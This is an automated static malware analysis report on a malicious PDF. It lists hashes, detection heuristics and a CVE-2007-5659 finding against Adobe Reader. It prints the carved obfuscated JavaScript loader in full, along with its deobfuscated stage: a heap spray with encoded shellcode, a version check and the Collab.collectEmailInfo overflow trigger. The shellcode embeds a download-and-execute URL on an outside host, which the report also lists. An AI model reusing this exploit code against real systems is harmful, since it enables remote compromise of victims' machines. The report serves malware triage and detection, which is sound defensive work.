Malicious PDF — malware analysis report

Static analysis result for SHA-256 a3c47b1002a4cf2c…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 43d1c861baccd38eeefa0b79f093a4b8 SHA-1: affc54760047791d4f1ec5a8110e9fdd3bbf3779 SHA-256: a3c47b1002a4cf2c4c423f36371c5a52e5ea7d58b3928a22ac001dcee45c8c1b
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains embedded JavaScript with multiple obfuscation indicators and a high-severity 'eval()' call. This suggests the script is designed to execute malicious code, likely downloading and running a secondary payload. The presence of 'eval()' is a strong indicator of code execution attempts. No specific family could be identified due to the obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function QZepbp5zLRk(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function ywF8Z7gX(EwA3GqJHA2){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(EwA3GqJHA2)"+";"+"}");eval("function iMZx3oySrVw(oBy0Yok3B5Z3Z){var yohHrQaNfH8O="+"0,UUM2jyOJvQ8tty=oBy0Yok3B5Z3Z.l"+"en"+"gth,ieE1cNZQ9bcCB=10"+"2"+"4,WxaGKb1IzJDQ,mJQV05,Rg8j8F='',eSWOEUyUoaV7=yohHrQaNfH8O,pJ1GQKgwTkgeR=yohHrQaNfH8O,mZ4iJVFh=yohHrQaNfH8O,UgEXGkdr …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=66&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x369 6528 bytes
SHA-256: 3c093d93c14390fa64eb77f9dc6913bd2f402f4d8f929ddcf8788e777daeb203
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 158 of 226 identifiers look randomly generated (e.g. 'vNMQEracMh4P352J_YidTJHNvDerMOp5ow4K1rfs'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function QZepbp5zLRk(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function ywF8Z7gX(EwA3GqJHA2){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(EwA3GqJHA2)"+";"+"}");eval("function iMZx3oySrVw(oBy0Yok3B5Z3Z){var yohHrQaNfH8O="+"0,UUM2jyOJvQ8tty=oBy0Yok3B5Z3Z.l"+"en"+"gth,ieE1cNZQ9bcCB=10"+"2"+"4,WxaGKb1IzJDQ,mJQV05,Rg8j8F='',eSWOEUyUoaV7=yohHrQaNfH8O,pJ1GQKgwTkgeR=yohHrQaNfH8O,mZ4iJVFh=yohHrQaNfH8O,UgEXGkdrZxrp=Ar"+"ra"+"y(63,2,41,50,33,5,62,31,35,46,0,0,0,0,0,0,4,61,56,45,3,18,22,20,34,19,28,29,10,51,24,9,17,16,32,37,7,26,60,49,39,0,48,0,0,0,0,1,0,52,54,12,36,53,47,30,11,25,40,55,14,38,42,6,58,43,13,8,27,59,23,15,57,21,44);f"+"o"+"r(mJQV05=M"+"at"+"h.c"+"ei"+"l(UUM2jyOJvQ8tty/"+"ieE1cNZQ9bcCB)"+";mJQV05>yohHrQaNfH8O;mJQV05-"+"-){fo"+"r(WxaGKb1IzJDQ=Ma"+"th.m"+"in(UUM2jyOJvQ8tty,ieE1cNZQ9bcCB);WxaGKb1IzJDQ>yohHrQaNfH8O;WxaGKb1IzJDQ-"+"-,UUM2jyOJvQ8tty-"+"-){mZ4iJVFh|"+"=(UgEXGkdrZxrp[oBy0Yok3B5Z3Z.cha"+"rCod"+"eAt(eSWOEUyUoaV7+"+"+)-48])<"+"<pJ1GQKgwTkgeR;if(pJ1GQKgwTkgeR){Rg8j8F+"+"=ywF8Z7gX"+"(65^mZ4iJVFh&"+"2"+"5"+"5);mZ4iJVFh>"+">="+"8;pJ1GQKgwTkgeR-"+"="+"2;}el"+"se{pJ1GQKgwTkgeR="+"6"+";}}"+"}return (Rg8j8F);}var QWKgG1=implode('',['4KDsM@oDeZ','H@k5__X@Dg4Wv','NfQH','r4_ZcMY1','l24m','g4K1rfs','ErjB3h4','yZs@Z1r2','P352J_YidTJHNvDer','MOC5blIsTcM','dR52@4L','2cTU42INbd1','L','CQEN2','P3','5','2J','_','YidT','JHNv','DerMO','fe1','Of','NE','r2zbJ','ACM@','3_McON','PLPjELM4','mldJPL','vYQ','ox_XsbeQKM','JENn','WvNd','JPLvY','Qox_Xsbe','QKMJHgV@o','Ovd','35','YdPgZO','HKrGkcX','@o74P3','5','2J','_Yi','dT','J','HNvD','erM','OfODr8sIrMR3hmdFJCCM','@','3_McO','NPLPjELMxbJ','j2','vNMQEracMh4P352J_YidTJHNvDerMOp5ow4K1rfs','Erj','B3h4y','Z','r','a_W@z','N8shdoU42I','Nk','Y3c4i3rYRMlMP','3','ozNXs','4WvNWSIJH','@XsWOEJHj','vNkY3c4e1','rBP','H1','eZQ','D','eYI','1x','NZL4Wv','NaV1O3s1','sW','QE','U8PoreOvK3','P','oreOv','K3Por','eOvK3PorWKY_DQor3OTKDQo','rkKXYB','Porx5kY','BP','or','x5','vJZ','Por@JRJ','3Por@cvK3Por@cZ','_YQor@','dvJaPo','r','TJY_1QorTJZ_','TQ','o','rxrRKTQor5J','QK@Qor@JY','_TQo','rkyT','_T','Qor@sTYTQorB','KZKePore','rk_3P','orB','KZKePo','rkPY_bPor@J','QJ','3Po','r@J','Y_DQork','yT_TQorDRv','J3Pork_vgbPor@YT','YZ','PorWi','vJ3Por','@JY','JZP','or@JY_TQorYYZKkPo','rDRT_DQorbi','vgbPorkPTJZP','or','WiT_ZPor@JY','J','T','Qor@','J','Y_TQorY','Y','ZKkPorDR','T','_bPor1','YQgbPor','Z5TKT','QorW','ik','J5Qor@JQJ','5Q','or@JY_TQorYYZKkPorDRT_3','PorW5','v','g','bPorWKZJZ','Po','rWivgTQo','r@J','RJDQor@','JY','_TQ','or','YYZKkPorDRk_TQorM','PQgbPo','r','W_Y','g','kPorWiTKbP','o','r@JZJ','BPor@JY_TQorYY','Z','KkPorY','JZ_D','Qo','r','5N','kKTQorB_ZJ1QorkKTJaPorTNTYYQo','r','@dvJkP','or@','JY_@Qor','DYT_T','QorB_','ZKk','Por','kyXY','DQor@cYYYQor@QQgaPorkykYkPo','rTNkYYQor','W','i','kYB','Por@J','ZK','eP','o','r@J','Y','_TQor','xik','YTQorTQv_BPorBKR','YW','Por','bSvJbPor@JY_TQorkKT_TQorTsTYYQor','M_ZK','ePorMKZK1','Qo','rkKkYTQor1JYYYQo','rZ5vgbPor','@JY_','TQ','o','rDJY_TQorY','YZKeP','or','x','P','k_DQorD','JT_5Q','or','DYZKePorW','ik_bPor@JQg','@Qor@','JY_T','QorYYY_1','QorM','SXYTQo','rDs','T_TQor1YTg','ZP','orM','SvgYQor@','cYY','TQorx_YgbP','or@','JY_TQorB','_YJ','WPork','yX','YTQo','r@sT','YYQ','or@QQgaP','orkykYkPorTNkYYQorYJQJbPor@JY_TQor','xPT_TQorDNT_xPorYY','Y_1Q','or5','s','RY','DQorDsRJePorZ5kY','1Qor','1JY','gYQor','DsZYT','Qo','rYY','Z','KePorxPk_3PorDJT_','YQorD','YZ','KePo','r','Wik_bPor@JR','Y1','Qor@JY_TQor@JQ','gaPo','rB_YJWPor','kyXY','TQ','or@NT','YYQor@GQgaPorkykYk','Po','r','TNkYY','Q','orTJQJ','bPor@JY','_TQo','rxPT_TQorky','TJWP','orTJY','YYQo','r@QQ','gaPork','ykYkPorTN','kY','YQo','r@JQJbPor@','JY_T','Qo','rYQ','Y_TQo','rDGZYeP','orWPY_1QorWP','Y','_','1QorWPY_1','Qo','rWPY_1','QorWOkK','1QorDQT_DQorkykY1','QorWyRJaPor','DGYJxPorW','KY','JWPorkykYYQ','orkyvJ3','Por','@NTgMPorD','ckKePorDRT_3P','orBOZKePork','yv_3PorTYTgD','Qor@sYg','bPor','DRTJ1QorB4kKePor@sR','Y','T','Qor5sYJ1','QorYJkJkPor','erT','Y@Q','orMOY_1Qor5s','ZYBPor@@T','JB','Po','rTJYK','ZPorZyQ','_','aPor@N','TgDQ','orM_kJ@Q','or@sY_MPorYJ','YJ5QorZPQ','JePorZ_v_','ePorB_ZY','ZPorDQvJY','Q','orWykKePor','D','Q','kKePo','r@sRY','DQorx4XJMPor','@s','kKePor','kyTYeP','or','Ts','kYaP','or3','rT','_1Qor@cZKe','Por@','sZKePorD','Yk','J','YQorMyZYMPor@JY_b','PorZr','QJb','PorZ5TJZ','PorDYY','JWPorY','sk','Y5','QorY','@TYMPor@JYYZPorbykKxPorb5XKe','PorMKRJYQ','or','k','_kJTQorkrkK','MPo','r34XJZ','Por','MPRJMPo','rkPZ','K3PorkPkJ','TQorb5XK','xPor','kO','ZJTQ','ork_','kKTQo','rMPZKeP','orkSXKWPor3KRKWPo','r','kykKB','Por3','KXJ','5Q','orMKXJkPorb5XK3Por3yZK1QorW5XJ','eroUp5brR','cINqGWsi','JQLYsDOar','k1lQ','INV5FJxGvJW','5vJW2vN','kY3c4KZhv','svh','zZ1','5','ZSv','oO','@o74e','1rBPH1e','ZQDeYI1','xNZLfe1O','f','NEr2@bU4','rXg4KDsM@blI','sTcMd','R52@','4L','2cvNV5bL','ycEoTd1Y3Q1KM','CRDa','@ot','4Sb_fJ4','JC','Z','1','hG','Yv','gi','d','RUWS8','Jx','4mg4K','DsM@oOvd35YdPg','ZOHKrGkcX@o7','4PMh','ds8','sR@DO2roiaRvJ','B5','TiaRvJB5kNj','2vNdJ','PL','vYQox_XsbeQKMJENV','5F_8QYh','adoOvd','35YdPgZOHKrGkcXaF','Nuc4JZc','I1FdE@n','d','3Jj2vN','kY3','c4_','_LeP','W','YXsT@cs','QNV','5FUm','J','DYB','zM','Jdz_hbOENz5','FJx','GvJW5vJW4m','tqGWs','iJQ','L','Y','sDOark1lQ8g','4KHhM@FUkY3c4SIDeiYlBc_7W2v','lrG','X_BRM@A__LePWYX','sT@csR','gx','aQKo','R','D','l','IjmU','j5m','l4WQrzs','WK','P','QZO','WR','Xox','aQKo','RDlIZPNV5','oOvd35YdPg','ZO','HKrGkcX@mU4e1r','BPH1eZQD','eY','I1xN','ZL','p5o','w4WINXQMhH','GDL9VENcNR1r','JEUj','5ml4KDsM@ocQs','voy@o74_E','cWV','brj','QH','rdcM5','dc8cjB3','hf','y8hEGMcjVHO2','4m','g4_D@3SP','54WvN','ZY4J','iG','W','t','MQEcCYHsddmtKGR','tm','ab','N84mg4KDs','M@F5TR','R1w','YMsy@o7','4A1Ob@oYMcDsBdocQsvoyVms2Y3','c','YGIUW4','FtZ','Y4JiG','WtHd1sMYQr2_TUC_D@3S','P','5fOELRc','DY','edb','Jj4mg','4','43','O4','SFUyJY1','LVY','c','8G4','oWW','PNV','WvNx5b','iX','5FU2yW_sj','ZDZcE5UYT','T4','W','T74','_vNXKFNyJY','1','LVYc8','G4oMW','P','NA5bJj5F','wA','@F5TRR1wYMsyj_JJ@F74_TUj5FwA','@','FUyJY1LVYc8G4oWWPNVWvNb5biX5F5TRR','1wYMsyj_JJ','@F74','_TU4eI','w4S','F5','TR','R1','wYM','syjPJJ@','F7','4iTUj','5ml4yZra_','W@zN8','shdoUp5','brRcI','N','@dW','cGsQrkzPNV','5orfQHcHYEcddbNdPIJH@Xs','dPI','JH@Xs84mg4iILj','a1O2PQoM','Q4','YeJM','ofe1OfN','Er','2','@F74yvK','BPkJ','j5o_icD','51GMr','t@mUV5','o_','icD51','G','MrtjvN','ed1L3Vms9a','EhRcH@eB3','c','d@o74ORhCa1s8Vms9aEhds','E','r@Z1s','ja11fJHh228ca','c3Lu5b','N8eo','h3N3g4PQoMQ4','YeJMoVRm','g4WI','NV@oDo','j','QD','Xd','oUp_']);");eval(iMZx3oySrVw(QWKgG1));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x369 2605 bytes
SHA-256: 03454a226313b91441f6afe1d9ff00ba80d103c19629dffa53643977a2c4ae51
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var MtmS6PEfp9 = new Array(); function DbEmu(eVhVAX81c7L4rf, zR3qrHWhPkh2) { while (eVhVAX81c7L4rf.length*2<zR3qrHWhPkh2){eVhVAX81c7L4rf += eVhVAX81c7L4rf;} eVhVAX81c7L4rf = eVhVAX81c7L4rf.substring(0,zR3qrHWhPkh2/2); return eVhVAX81c7L4rf; } function Dv5QRmwcJ() { var gvAyz2eZm7c = 0x0c0c0c0c; var lu9eKtMLtqHxGj = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u363D%u2636%u7073%u3D6C%u0034"); var jTbXFhAse52JOu = 0x400000; var FnV3lmmU18XH = lu9eKtMLtqHxGj.length * 2; var zR3qrHWhPkh2 = jTbXFhAse52JOu - (FnV3lmmU18XH+0x38); var eVhVAX81c7L4rf = unescape("%u9090%u9090"); eVhVAX81c7L4rf = DbEmu(eVhVAX81c7L4rf, zR3qrHWhPkh2); var Qi4UBf3QMC = (gvAyz2eZm7c - 0x400000)/jTbXFhAse52JOu; for (var xL4GyyR=0;xL4GyyR<Qi4UBf3QMC;xL4GyyR++) { MtmS6PEfp9[xL4GyyR] = eVhVAX81c7L4rf + lu9eKtMLtqHxGj; } } function MGKLf() { var qQ3XT = app.viewerVersion.toString(); qQ3XT = qQ3XT.replace(/\D/g,""); var TFIKNqbT = new Array(qQ3XT.charAt(0),qQ3XT.charAt(1),qQ3XT.charAt(2)); if ((TFIKNqbT[0] == 8 && ((TFIKNqbT[1] == 1 && TFIKNqbT[2] < 2) || TFIKNqbT[1] < 1)) || (TFIKNqbT[0] == 7 && TFIKNqbT[1] < 1) || (TFIKNqbT[0] < 7)) { Dv5QRmwcJ(); var EXrUCtvZ = unescape("%u0c0c%u0c0c"); while(EXrUCtvZ.length < 44952) EXrUCtvZ += EXrUCtvZ; this.collabStore = Collab.collectEmailInfo({subj: "",msg: EXrUCtvZ}); } } MGKLf();

Open this report in the interactive analyzer, or submit your own file for analysis.